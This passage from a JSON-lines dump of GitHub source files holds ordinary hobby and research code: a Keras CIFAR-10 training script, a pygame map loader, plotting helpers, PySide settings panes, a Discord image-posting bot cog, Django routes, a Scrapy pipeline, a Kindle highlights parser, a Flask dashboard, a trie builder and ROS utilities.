# Compile the model\r\nopt = Adam(lr=0.0005)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n\r\n# data aug\r\ndatagen = ImageDataGenerator(\r\n    rotation_range=0.1,\r\n    width_shift_range=0.1,\r\n    height_shift_range=0.1,\r\n    horizontal_flip=True)\r\n\r\n# Train the model (with augmentation)\r\nhistory = model.fit_generator(datagen.flow(x_train, y_train, batch_size=16),\r\n                    steps_per_epoch=x_train.shape[0]/16,\r\n                    epochs=20,\r\n                    validation_data=(x_test, y_test),\r\n                    workers=4)\r\n\r\n# Train the model (without augmentation)\r\n# history = model.fit(x_train, y_train, batch_size=16, epochs=10, verbose=1, validation_split=0.2)\r\n#\r\n\r\n# Save the model\r\nif not os.path.exists(save_dir):\r\n    os.makedirs(save_dir)\r\nmodel_path = os.path.join(save_dir, model_name)\r\nmodel.save(model_path)\r\n\r\n#predict\r\nprint(\"Test start\")\r\nscore = model.evaluate(x_test, y_test)\r\nprint('\\nTest loss:', score[0])\r\nprint('Test accuracy:', score[1])\r\n\r\nplot_loss(history)\r\nplt.show()\r\nplot_acc(history)\r\nplt.show()","repo_name":"junn2e/KSA_Module_6","sub_path":"CIFAR-10_Practice/CIFAR_10_CNN.py","file_name":"CIFAR_10_CNN.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31443504597","text":"import dataclasses\nimport logging\nfrom functools import partial\nfrom typing import Tuple\n\nfrom pygame.rect import Rect\n\nimport pytmx\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    from pygame._sdl2 import Texture, Image, Renderer, Window\n    import pygame\nexcept ImportError:\n    logger.error(\"cannot import pygame (is it installed?)\")\n    raise\n\n\n@dataclasses.dataclass(order=True)\nclass PygameSDL2Tile:\n    texture: Texture\n    srcrect: Rect\n    size: Tuple[int, int]\n    angle: float = 0.0\n    center: None = None\n    flipx: bool = False\n    flipy: bool = False\n\n\ndef handle_flags(flags: pytmx.TileFlags):\n    \"\"\"\n    Return angle and flip values for the SDL2 renderer\n\n    \"\"\"\n    if flags is None:\n        return 0.0, False, False\n\n    if flags.flipped_diagonally:\n        if flags.flipped_vertically:\n            return 270, False, False\n        else:\n            return 90, False, False\n    else:\n        return 0.0, flags.flipped_horizontally, flags.flipped_vertically\n\n\ndef pygame_sd2_image_loader(renderer: Renderer, filename: str, colorkey, **kwargs):\n    \"\"\"\n    pytmx image loader for pygame\n\n    \"\"\"\n    image = pygame.image.load(filename)\n    parent_rect = image.get_rect()\n    texture = Texture.from_surface(renderer, image)\n\n    def load_image(rect=None, flags=None) -> PygameSDL2Tile:\n        if rect:\n            assert parent_rect.contains(rect)\n        else:\n            rect = parent_rect\n\n        angle, flipx, flipy = handle_flags(flags)\n        rect = Rect(*rect)\n        size = rect.size\n        return PygameSDL2Tile(\n            texture=texture,\n            srcrect=rect,\n            size=size,\n            angle=angle,\n            center=None,\n            flipx=flipx,\n            flipy=flipy,\n        )\n\n    return load_image\n\n\ndef load_pygame_sdl2(renderer: Renderer, filename: str, *args, **kwargs):\n    \"\"\"\n    Load a TMX file, images, and return a TiledMap class\n\n    \"\"\"\n    kwargs[\"image_loader\"] = partial(pygame_sd2_image_loader, renderer)\n    return pytmx.TiledMap(filename, *args, **kwargs)\n","repo_name":"bitcraft/pytmx","sub_path":"pytmx/util_pygame_sdl2.py","file_name":"util_pygame_sdl2.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":361,"dataset":"github-code","pt":"19"}
+{"seq_id":"21809350304","text":"# this file sets up the visualization grid and runs functions that make plots to be put in the grid\n\n\nimport matplotlib as mpl\nimport 
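load_pygame_sdl2 above needs a live pygame._sdl2 Renderer before any Texture can be created from the map's tilesets. A hedged setup sketch; 'level1.tmx' is a placeholder filename:

import pygame
from pygame._sdl2 import Window, Renderer

pygame.init()
window = Window('tiled map', size=(800, 600))
renderer = Renderer(window)
tmx_map = load_pygame_sdl2(renderer, 'level1.tmx')  # pytmx.TiledMap with SDL2 tiles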
matplotlib.pyplot as plt\nimport graph_data_improved\n\n# this is the overarching function to graph data, given parameter data:\n# \"data\": [speed, accel, lanes, classes, lengths], where\n# speed: list of speeds at specific time intervals of each trajectory\n# accel: list of accels at specific time intervals of each traj\n# lanes: dic of lane occupations of all trajectories\n# classes: dic of vehicle classes of all trajectories\n# lengths: list of trajectory lengths\n# creates a graph of five subplots\ndef graph(data):\n cur_avg_speed, cur_avg_accel, lanes_occupied, vehicle_classes, lengths = data\n fontsize = 5\n\n figure = plt.figure()\n\n plt.rcParams.update({'font.size': 8})\n plt.subplots_adjust(left = 0.125, right = 0.9, bottom = 0.1, top = 0.9, wspace=0.2, hspace=0.5)\n\n # set up height ratio of grid\n gs = mpl.gridspec.GridSpec(nrows=4, ncols=2, height_ratios=[1,4,4,4])\n\n title = figure.add_subplot(gs[0,0:2])\n title.set_axis_off()\n title.text(0.47,0.5,\"Plots\", fontsize=20, color=\"#808080\")\n\n # make each subplot\n i1 = figure.add_subplot(gs[1,0])\n i2 = figure.add_subplot(gs[1,1])\n i3 = figure.add_subplot(gs[2,0])\n i4 = figure.add_subplot(gs[2,1])\n i5 = figure.add_subplot(gs[3,0])\n\n # graph each subplot\n graph_data_improved.graph_cur_avg_speed(cur_avg_speed, i1)\n graph_data_improved.graph_cur_avg_accel(cur_avg_accel, i2)\n graph_data_improved.graph_lane_occupation(lanes_occupied,i3)\n graph_data_improved.graph_vehicle_class(vehicle_classes,i4)\n graph_data_improved.graph_traj_length(lengths, i5)\n\n\n i6 = figure.add_subplot(gs[3,1])\n i6.tick_params(left = False, right = False , labelleft = False ,\n labelbottom = False, bottom = False)\n\n plt.show()\n\n","repo_name":"janewjsun/research_spring_23","sub_path":"visualization_grid.py","file_name":"visualization_grid.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22410417354","text":"from PySide import QtGui\n\nfrom xldlib.gui.views import widgets\nfrom xldlib.gui.views.widgets import updating\nfrom xldlib.utils import logger\n\nfrom . 
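graph() above unpacks its argument into exactly five pieces before handing each panel to a graph_data_improved helper. An illustrative call with toy values; the shapes are inferred from the unpacking, not from the helpers themselves:

data = (
    [0.0, 1.2, 2.5, 3.1],        # cur_avg_speed per time interval
    [0.0, 0.4, -0.1, 0.2],       # cur_avg_accel per time interval
    {'lane 1': 3, 'lane 2': 5},  # lane -> occupation count
    {'car': 6, 'truck': 2},      # vehicle class -> count
    [10, 12, 9],                 # trajectory lengths
)
graph(data)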
import base\n\n\n# SECTIONS\n# --------\n\n\n@logger.init('gui', 'DEBUG')\nclass LinkingSection(base.BaseSection):\n '''Section for setting search hit inclusion'''\n\n # SECTION\n # -------\n _title = \"Linking\"\n\n def __init__(self, parent):\n super(LinkingSection, self).__init__(parent)\n\n self.verify()\n self.scan_steps()\n self.precursor_intensity()\n self.add_spacer()\n\n # ITEMS\n\n def verify(self):\n '''Sets a checkbox for whether to verify the precursor scan or not'''\n\n storage = updating.Storage('check_precursor')\n verify = updating.CheckBox(\"Verify Precursor\", self, storage,\n tooltip=\"Verify the precursor m/z exists in precursor scan\")\n\n self.layout.addWidget(verify)\n\n def scan_steps(self):\n '''Sets the scan steps for precursor scan linking'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Max Steps\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('precursor_scan_steps')\n steps = updating.SpinBox(self, storage,\n minimum=5,\n maximum=1000,\n tooltip=\"Maximum scans preceeding the identified product scan\\n\"\n \"to search for the precursor scan.\",\n width=75)\n hlayout.addWidget(steps)\n\n def precursor_intensity(self):\n '''Sets the minimum intensity required for precursor matching'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Max Missing Precursors\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('missing_precursor_threshold')\n intensity = updating.SpinBox(self, storage,\n minimum=0,\n maximum=100,\n tooltip=\"Maximum number (percent) of product scans without\\n\"\n \"linked precursor scans before reporting mismatched files.\",\n suffix='%',\n width=75)\n hlayout.addWidget(intensity)\n\n\n@logger.init('gui', 'DEBUG')\nclass LevelsSection(base.BaseSection):\n '''Section for setting search hit inclusion'''\n\n # SECTION\n # -------\n _title = \"Levels\"\n\n def __init__(self, parent):\n super(LevelsSection, self).__init__(parent)\n\n self.precursor_level()\n self.product_level()\n self.add_spacer()\n\n # ITEMS\n\n def precursor_level(self):\n '''Sets the MS level for the precursor scan data'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Precursor\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('precursor_scan_level')\n level = updating.SpinBox(self, storage,\n minimum=2,\n maximum=10,\n tooltip=\"Precursor Scan Level\",\n prefix='MS',\n width=75)\n hlayout.addWidget(level)\n\n def product_level(self):\n '''Sets the MS level for the product scan data'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Product\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('product_scan_level')\n level = updating.SpinBox(self, storage,\n minimum=2,\n maximum=10,\n tooltip=\"Product Scan Level\",\n prefix='MS',\n width=75)\n hlayout.addWidget(level)\n\n\n# PANES\n# -----\n\n\n@logger.init('gui', 'DEBUG')\nclass ScansPane(base.BaseSettings):\n '''Definitions for scan settings'''\n\n def __init__(self, parent):\n super(ScansPane, self).__init__(parent)\n\n self.layout.addWidget(LinkingSection(self))\n self.layout.addWidget(LevelsSection(self))\n","repo_name":"Alexhuszagh/XLDiscoverer","sub_path":"xldlib/gui/views/discoverer/settings/scans.py","file_name":"scans.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20432678067","text":"import discord\r\nimport os\r\nimport random\r\nfrom discord.ext import 
commands\r\nfrom discord.ext.commands import Bot\r\n\r\nclass annoy(commands.Cog):\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.command()\r\n @commands.has_role(\"Not racist\")\r\n @commands.cooldown(5,150, commands.BucketType.channel)\r\n async def spam(self, ctx, folder=\"die\"):\r\n message = ctx.message\r\n bruh=[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\r\n await message.delete(delay=45)\r\n if (folder==\"hentai\" or folder==\"Hentai\"):\r\n if ctx.channel.is_nsfw():\r\n image = os.listdir('./Spam_commands/Spam/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Spam/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n else:\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n if (folder==\"legs\" or folder==\"Legs\"):\r\n image = os.listdir('./Spam_commands/Legs/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Legs/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"cringe\" or folder==\"Cringe\"):\r\n image = os.listdir('./Spam_commands/Cringe/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Cringe/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"dead\" or folder==\"Dead\" or folder==\"Ded\" or folder==\"ded\"):\r\n image = os.listdir('./Spam_commands/Skeleton/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Skeleton/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n \r\n if (folder==\"rishi\" or folder==\"Rishi\"):\r\n image = os.listdir('./Spam_commands/rishi/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/rishi/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"cursed\" or folder==\"Cursed\"):\r\n if ctx.channel.is_nsfw():\r\n image = os.listdir('./Spam_commands/Cursed/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Cursed/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n else:\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n if (folder==\"die\" or folder==\"die\"):\r\n image = os.listdir('./Spam_commands/die/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/die/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n \r\n @spam.error\r\n async def spam_error(self, ctx, error):\r\n if isinstance(error, commands.CommandOnCooldown):\r\n await ctx.send(f'Command is on cooldown', delete_after=120)\r\n if isinstance(error, commands.NSFWChannelRequired):\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n \r\ndef setup(client):\r\n client.add_cog(annoy(client))","repo_name":"nalyd1369/Discord-Bot-PY","sub_path":"spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5132870054","text":"# 
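The spam command's long alias chain maps a folder name to a directory plus an NSFW restriction. A table-driven sketch of the same dispatch, not the author's code; the paths and NSFW flags are copied from the if-chain above:

FOLDERS = {
    'hentai': ('./Spam_commands/Spam/', True),
    'legs': ('./Spam_commands/Legs/', False),
    'cringe': ('./Spam_commands/Cringe/', False),
    'dead': ('./Spam_commands/Skeleton/', False),
    'ded': ('./Spam_commands/Skeleton/', False),
    'rishi': ('./Spam_commands/rishi/', False),
    'cursed': ('./Spam_commands/Cursed/', True),
    'die': ('./Spam_commands/die/', False),
}

def resolve_folder(name):
    # Returns (directory, nsfw_only) or None for unknown folders.
    return FOLDERS.get(name.lower())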
-*- coding: utf-8 -*-\n\ntwitter_base_api_url = \"https://{api}.twitter.com/{version}\"\ntwitter_api_version = \"1.1\"\n\nrequest_methods = {\"get\", \"post\", \"put\", \"delete\", \"patch\", \"option\", \"head\"}\nstreaming_apis = {\"stream\", \"userstream\", \"sitestream\"}\n\nrate_limit_notices = [\n    b\"Exceeded connection limit for user\",\n    b\"Easy there, Turbo. Too many requests recently. Enhance your calm.\",\n]\n","repo_name":"odrling/peony-twitter","sub_path":"peony/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"}
+{"seq_id":"32701469477","text":"from django.urls import path\nfrom . import views\n# function-based views are used so debugging stays straightforward\n# each route links a template to its view\n\nurlpatterns = [\n    # <str:id> = dynamic per-user views keyed by the id of the data they created\n    path('', views.index, name='index'),\n    path('', views.home, name='home'),\n    path('create/', views.create, name='create'),\n    path('view/<str:id>', views.view, name='view'),\n    path('existing/<str:id>', views.create, name='existing'),\n    path('delete/<str:id>', views.delete, name='delete'),\n    path('allrecipes/', views.allrecipes, name='allrecipes'),\n    path('foodnetwork/', views.foodnetwork, name='foodnetwork'),\n    path('food_com/', views.food_com, name='food_com'),\n    path('about/', views.about, name='about'),\n    path('contact/', views.contact, name='contact')\n]","repo_name":"psiphi-py/CIMI","sub_path":"canImakeIt/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33670297266","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport heartsong.settings\n\n\nclass HeartsongPipeline(object):\n    def process_item(self, item, spider):\n        # append each scraped item to item.txt, one per line\n        with open(\"item.txt\", \"a\") as file:\n            file.write(str(item))\n            file.write('\\n')\n        print(item)\n        return item\n","repo_name":"onlyoneprogram/git-python","sub_path":"python/heartsong/heartsong/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3530208500","text":"#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nfrom re import sub\n\n\ndef extract_books(soup):\n    \"\"\"Extract books from the given soup.\"\"\"\n    books = {}\n    for d in soup.find_all('div', 'bookMain'):\n        asin = sub(r'_.*$', '', d['id'])\n        title = d.find('span', 'title').text.strip()\n        author = sub(r'by ', '', d.find('span', 'author').text.strip())\n        author = sub('\\n', '', author)\n\n        books[asin] = dict(asin=asin, title=title, author=author)\n\n    return books\n\n\ndef extract_highlights(soup, books):\n    \"\"\"Extract highlights from a soup.\"\"\"\n    clippings = []\n    for d in soup.find_all('div', 'yourHighlight'):\n        try:\n            clipping_text = d.find('span', 'highlight').text\n            clipping_text = sub('\\n', '', clipping_text)\n            asin = d.find('span', 'asin').text\n            loc = d.find('span', 'end_location').text\n            book = books[asin]\n            clipping = {\n                'book': '{} ({})'.format(book['title'], book['author']),\n                'clipping_text': clipping_text,\n                'location': loc,\n                'date': '',\n            }\n            clippings.append(clipping)\n        except AttributeError:\n            pass\n    return clippings\n\n\ndef main():\n    with open(\"Highlights.html\") 
as f:\n soup = BeautifulSoup(f)\n books = extract_books(soup)\n\n clippings = extract_highlights(soup, books)\n for clipping in clippings:\n print(\"\\t\".join([clipping['book'],\n clipping['clipping_text'],\n clipping['location'],\n clipping['date']]))\n\n\nif __name__ == '__main__':\n main()\n\n# vim:set fileencoding=utf-8:\n","repo_name":"neingeist/kindle-to-anki","sub_path":"kindle-html-to-anki.py","file_name":"kindle-html-to-anki.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"9236986842","text":"#!/usr/bin/python\nfrom flask import Flask, render_template\nfrom json import load, loads\nfrom random import randint\nimport requests\nimport os\n\napp = Flask(__name__)\n\nhost = os.getenv('CORE_STACK_SERVICE_HOST')\nport = os.getenv('CORE_STACK_SERVICE_PORT')\n\napi_service = \"http://{}:{}\".format(host, port)\nuserslist = load(open(\"./list.json\", \"r\"))\n\n@app.route(\"/\")\ndef main():\n random = randint(0, len(userslist))\n userid = userslist[random]\n url = \"{}/user/{}\".format(api_service, userid)\n response = requests.get(url=url)\n if response.status_code == requests.codes.get('ok'):\n data = loads(response.json())\n shsid = data.get(\"shsid\")\n url = \"{}/shs/{}\".format(api_service, shsid)\n response = requests.get(url=url)\n if response.status_code == requests.codes.get('ok'):\n data = loads(response.json())\n return render_template(\"index.html\", data=data)\n else:\n return render_template(\"error.html\", data=response.status_code)\n else:\n return render_template(\"error.html\", data=response.status_code)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='5000', debug=True)\n","repo_name":"mcaliandro/fogcloud-project","sub_path":"application/dashboard/v1/Dashboard.py","file_name":"Dashboard.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73850952364","text":"# from Python_intermediate.Lesson2Test.parse_content import parse_content\n\nfrom Lesson2Test.parse_content import parse_content\n\ntext = open('contents')\ntext2 = text.read().strip().replace(',', ' ')\ndict = parse_content(text2)\n\ndef make_tree(dict):\n\n tree : dict = {}\n\n words_list = []\n for key in dict.keys():\n words_list.append(key)\n\n numbers = []\n for value in dict.values():\n numbers.append(value)\n\n\n def check_add(id : int, dict : dict, word : str) -> dict:\n new_dict : dict = {}\n char = word[id]\n if id == len(word) - 1:\n if char in dict:\n y = dict[char]\n y['$' + word] = y.get('$' + word, numbers[words_list.index(word)])\n return dict[char]\n else:\n new_dict['$' + word] = numbers[words_list.index(word)]\n dict[char] = new_dict\n return new_dict\n else:\n if char in dict:\n return dict[char]\n else:\n dict[char] = new_dict\n return new_dict\n\n for word in words_list:\n x : dict = tree\n for index in range(len(word)):\n x = check_add(index, x, word)\n\n return tree\n\n# print(make_tree(dict))\n\n# print(tree)\n\n\n\n\n\n\n\n# dict = {'ban': 10, 'band': 5, 'bar': 14, 'can': 32, 'candy': 7}\n\n\n\"\"\"\n{'b': \n {'a': \n {'n': {'$ban': 10, \n 'd': {'$band': 5}}, \n 'r': {'$bar': 14}}},\n 'c': \n {'a': \n {'n': {'$can': 32, \n 'd': \n {'y': {'$candy': 
7}}}}}}\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"grzegorzpikus/Python_Intermediate_exercises_Udacity","sub_path":"Lesson2Test/make_tree.py","file_name":"make_tree.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21143486529","text":"# -*- coding: utf-8 -*-\n__all__ = (\"Package\", \"PackageDatabase\",)\n\nimport os\nimport typing\nimport typing as t\nfrom abc import ABC, abstractmethod\n\nimport attr\nfrom loguru import logger\n\nfrom .action import ActionFormat\nfrom .msg import MsgFormat\nfrom .package_xml.package import PackageDefinition, parse_package_string\nfrom .srv import SrvFormat\n\nif t.TYPE_CHECKING:\n from .. import AppInstance\n\n\nMF = typing.TypeVar(\"MF\", bound=MsgFormat)\nSF = typing.TypeVar(\"SF\", bound=SrvFormat)\nAF = typing.TypeVar(\"AF\", bound=ActionFormat)\n\n\nclass Package(t.Generic[MF, SF, AF], ABC):\n name: str\n path: str\n messages: t.Collection[MF]\n services: t.Collection[SF]\n actions: t.Collection[AF]\n\n @classmethod\n @abstractmethod\n def from_dict(cls, dict: t.Dict[str, t.Any]) -> \"Package\":\n ...\n\n def to_dict(self) -> t.Dict[str, t.Any]:\n d = {\n \"name\": self.name,\n \"path\": self.path,\n \"messages\": [m.to_dict() for m in self.messages],\n \"services\": [s.to_dict() for s in self.services],\n \"actions\": [a.to_dict() for a in self.actions],\n }\n return d\n\n\nPT = typing.TypeVar(\"PT\", bound=Package)\n\n\n@attr.s(frozen=True)\nclass PackageDatabase(t.Generic[PT], ABC, t.Mapping[str, PT]):\n \"\"\"\n An immutable database of packages, represented as :class:`Package`\n instances, indexed by their names, given as :class:`str`.\n\n Note\n ----\n Implements most :class:`dict` operations via\n :class:`abc.collections.Mapping`,\n including :code:`db['name']`, :code:`len(db)`), :code:`db.keys()`,\n :code:`db.values()`, and :code:`iter(db)`.\n As instances of this class are immutable, no destructive\n :class:`dict` operations are provided (e.g., :code:`del db['foo'])`\n and `db['foo'] = bar`).\n \"\"\"\n\n _contents: t.Mapping[str, PT] = attr.ib()\n _definitions: t.Dict[str, PackageDefinition] = attr.ib(factory=dict)\n\n @classmethod\n def from_packages(cls,\n packages: typing.Iterable[PT]\n ) -> \"PackageDatabase[PT]\":\n return cls({p.name: p for p in packages})\n\n @classmethod\n def from_paths(cls,\n app_instance: \"AppInstance\",\n paths: t.List[str],\n ignore_bad_paths: bool = True,\n ) -> \"PackageDatabase[PT]\":\n \"\"\"\n Constructs a package database from a list of the paths of the packages\n belonging to the database.\n\n Parameters\n ----------\n app_instance: AppInstance\n an instance of an application from which to get\n the package database\n paths: List[str]\n a list of the absolute paths of the packages.\n ignore_bad_paths: bool\n If :code:`True`, non-existent paths will be ignored.\n If :code:`False`, a :exc:`FileNotFoundError` will be raised.\n\n Raises\n ------\n FileNotFoundError\n if no package is found at a given path.\n \"\"\"\n packages: t.Dict[str, PT] = {}\n for p in paths:\n try:\n package = cls._build_package(app_instance, p)\n except FileNotFoundError:\n logger.exception(f\"unable to build package: {p}\")\n if not ignore_bad_paths:\n raise\n else:\n if package.name not in packages:\n packages[package.name] = package\n return cls.from_packages(packages.values())\n\n @classmethod\n @abstractmethod\n def _build_package(cls, app_instance: \"AppInstance\", path: str) -> PT:\n ...\n\n @classmethod\n def build(cls,\n 
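In the trie built by make_tree above, a word's count lives under a '$'-prefixed key at the node its last letter reaches, as the sample structure in the docstring shows. A small lookup that walks such a trie:

def lookup(tree, word):
    node = tree
    for ch in word:
        node = node.get(ch)
        if node is None:
            return None
    return node.get('$' + word)

sample = {'b': {'a': {'n': {'$ban': 10, 'd': {'$band': 5}}, 'r': {'$bar': 14}}}}
assert lookup(sample, 'ban') == 10
assert lookup(sample, 'band') == 5
assert lookup(sample, 'bandit') is None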
app_instance: \"AppInstance\",\n paths: t.Optional[t.List[str]] = None\n ) -> \"PackageDatabase[PT]\":\n if paths is None:\n paths = cls._determine_paths(app_instance)\n db_package = cls.from_paths(app_instance, paths)\n return db_package\n\n @classmethod\n @abstractmethod\n def _determine_paths(cls, app_instance: \"AppInstance\") -> t.List[str]:\n ...\n\n @classmethod\n @abstractmethod\n def from_dict(cls, d: t.List[t.Dict[str, t.Any]]) -> \"PackageDatabase[PT]\":\n ...\n\n def to_dict(self) -> t.List[t.Dict[str, t.Any]]:\n return [p.to_dict() for p in self.values()]\n\n def __len__(self) -> int:\n \"\"\"Returns the number of packages within this database.\"\"\"\n return len(self._contents)\n\n def __getitem__(self, name: str) -> PT:\n \"\"\"Fetches the description for a given package.\n\n Raises\n ------\n KeyError\n if no package exists with the given name.\n \"\"\"\n return self._contents[name]\n\n def __iter__(self) -> t.Iterator[str]:\n \"\"\"\n Returns an iterator over the names of the packages contained within\n this database.\n \"\"\"\n yield from self._contents\n\n def get_package_definition(self, package: Package, app_instance: \"AppInstance\") -> PackageDefinition:\n \"\"\"\n Return the contents of the package.xml file associated with the package.\n\n This function reads the package.xml on-demand, and then returns a cached copy thereafter.\n\n Parameters\n ----------\n package: Package\n The package to get the definition of\n app_instance: AppInstance\n The AppInstance that contains the defintion\n\n Returns\n -------\n PackageDefinition\n The definition of the pacakge as defined in package.xml\n \"\"\"\n if package.name in self._definitions:\n return self._definitions[package.name]\n\n package_xml = os.path.join(package.path, \"package.xml\")\n if not app_instance.files.isfile(package_xml):\n raise ValueError(f'No package.xml for package \"{package.name}\" in \"{package.path}')\n\n contents = app_instance.files.read(package_xml)\n defn = parse_package_string(contents, filename=package_xml)\n self._definitions[package.name] = defn\n return defn\n","repo_name":"rosqual/roswire","sub_path":"src/roswire/common/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"35679471638","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (\n CharactersViewset,\n QuotesViewset,\n FavoriteCharacterView,\n FavoriteQuoteAndCharacterView,\n FavoritesViewset\n)\n\n\nrouter = DefaultRouter(trailing_slash=False)\nrouter.register(r'characters', CharactersViewset)\nrouter.register(r'^characters/(?P\\d+)/quotes', QuotesViewset, basename='character_quotes')\nrouter.register(r'favorites', FavoritesViewset)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('characters//favorites', FavoriteCharacterView.as_view()),\n path('characters//quotes//favorites', FavoriteQuoteAndCharacterView.as_view())\n]","repo_name":"Ezenwankwo/aspirechallenge","sub_path":"movie/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44194967925","text":"#! 
/usr/bin/env python\n'''navigation using MoveBase and the navigation stack\n\nIn a way very similar to how the :any:`node-bug-m` acts, this node\nimplements a composite behaviour which drives the robot towards a target\nplus a final orientation. But in this case, the node uses MoveBase and\nthe navigation stack to reach the final position. \n\nAuthors\n\tprof. Carmine Recchiuto (UniGe), Francesco Ganci (S4143910)\n\nVersion:\n\tv1.5.0\n'''\n\nimport rospy\nimport os\nfrom std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse\nfrom std_srvs.srv import Empty, EmptyRequest, EmptyResponse\nfrom geometry_msgs.msg import Point\nfrom tf import transformations\nimport math\nfrom nav_msgs.msg import Odometry\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom actionlib_msgs.msg import GoalID\n\n\n\nactive_ = False\n''' the activity status of the node. \n'''\n\n\n\nservice_move_base_switch = \"/nav_stack_switch\"\n''' name of the service to trigger the state of the node\n'''\n\nsrv_move_base_switch = None\n''' service handle for :any:`service_move_base_switch`\n'''\n\ndef move_base_switch( data ):\n\t''' used for switching the activity status of the node. \n\t\n\tThe node also updates the target, reading the new one from the parameters\n\tserver. \n\t\n\tArguments:\n\t\tdata (SetBool) :\n\t\t\tthe boolean SetBool.data inside the message is the new activity status\n\t\n\tNote:\n\t\tbefore calling the service, make sure the three ros parameters\n\t\t'des_pos_x' , 'des_pos_y' and 'des_yaw' have been set.\n\t\n\tTodo:\n\t\tdifferently from the other behavioural nodes, this node requires\n\t\tto be retriggered using this service each time the objective changes. \n\t\tthis could be a design issue. The node should update automatically\n\t\tthe objective when it changes. \n\t'''\n\t\n\tglobal active_\n\tglobal desired_position_, desired_yaw_\n\t\n\tres = SetBoolResponse( )\n\tres.success = True\n\tres.message = \"\"\n\t\n\t# check the activity status\n\tif active_ and not data.data:\n\t\t# rospy.loginfo( \"(move_base_nav ) move_base navigation is OFF\" )\n\t\tactive_ = False\n\t\tchange_state( 0 )\n\t\t\n\telif not active_ and data.data:\n\t\t#rospy.loginfo( \"(move_base_nav ) move_base navigation is ON\" )\n\t\tactive_ = True\n\t\t\n\telif active_ and data.data:\n\t\t#rospy.loginfo( \"(move_base_nav ) switching target\" )\n\t\tpass\n\t\n\telse:\n\t\tres.message = \"trying to disable something already off ...\" \n\t\n\tif active_:\n\t\tdesired_position_.x = rospy.get_param( \"des_pos_x\" )\n\t\tdesired_position_.y = rospy.get_param( \"des_pos_y\" 